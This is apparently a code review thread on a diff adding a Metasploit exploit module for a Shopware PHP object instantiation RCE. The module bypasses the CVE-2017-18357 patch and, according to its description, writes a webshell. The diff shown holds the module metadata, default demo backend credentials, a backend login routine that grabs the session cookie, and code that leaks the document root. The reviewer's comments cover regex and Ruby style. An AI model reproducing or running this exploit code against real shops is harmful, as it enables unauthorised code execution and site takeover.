modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb

```diff
@@ -0,0 +1,262 @@
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => "Shopware createInstanceFromNamedArguments PHP Object Instantiation RCE",
+      'Description' => %q(
+        This module exploits a php object instantiation vulnerability that can lead to RCE in
+        Shopware. An authenticated backend user could exploit the vulnerability.
+
+        The vulnerability exists in the createInstanceFromNamedArguments function, where the code
+        insufficiently performs whitelist check which can be bypassed to trigger an object injection.
+
+        An attacker can leverage this to deserialize an arbitrary payload and write a webshell to
+        the target system, resulting in remote code execution.
+
+        Tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.
+      ),
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Karim Ouerghemmi',               # original discovery
+          'mr_me <steven@srcincite.io>',    # patch bypass, rce & msf module
+        ],
+      'References' =>
+        [
+          ['CVE', '2017-18357'],                                                                         # not really because we bypassed this patch
+          ['URL', 'https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/']      # initial writeup w/ limited exploitation
+        ],
+      'Platform' => 'php',
+      'Arch' => ARCH_PHP,
+      'Targets' => [['Automatic', {}]],
+      'Privileged' => false,
+      'DisclosureDate' => "May 09 2019",
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, "Base Shopware path", '/']),
+        OptString.new('USERNAME', [true, "Backend username to authenticate with", 'demo']),
+        OptString.new('PASSWORD', [false, "Backend password to authenticate with", 'demo'])
+      ]
+    )
+  end
+
+  def do_login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'Login', 'login'),
+      'vars_post' => {
+        'username' => datastore['username'],
+        'password' => datastore['password'],
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200
+      @cookie = res.get_cookies.match(/(SHOPWAREBACKEND=.{26};)/)[1]
+      return
+    end
+    fail_with(Failure::NoAccess, "Authentication was unsuccessful")
+  end
+
+  def get_webroot
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'backend', 'systeminfo', 'info'),
+      'headers' => {
+        'Cookie' => @cookie,
+      }
+    )
+    unless res
+      fail_with(Failure::Unreachable, "Connection failed")
+    end
+    if res.code == 200 && res.body =~ /DOCUMENT_ROOT/i
```

Comment:
This is a little ugly due to the lengthy right hand operator.

Also, from a style perspective, avoiding Perl style back references (ie, `$1`) is generally preferred (but not a rule).

Also, `%r{}` notation can be used for regex in place of `//` which will save having to perform escaping. (Also, I'm fairly certain that `"` does not need to be `\"` escaped.)

Also, the case insensitive match `/DOCUMENT_ROOT/i` is redundant when the following regex is case sensitive.

Suggest something like this:

```ruby
    if res.code == 200
      @webroot = res.body.scan(%r{DOCUMENT_ROOT </td><td class=\"v\">(.*) </td></tr>}).flatten.first
    end

    if @webroot.blank?
      fail_with(Failure::Unknown, 'Unable to leak the webroot')
    end
```

Reply:
I tested your sample code and I get: 
`[-] Exploit aborted due to failure: unknown: Unable to leak the webroot`.

Reply:
done.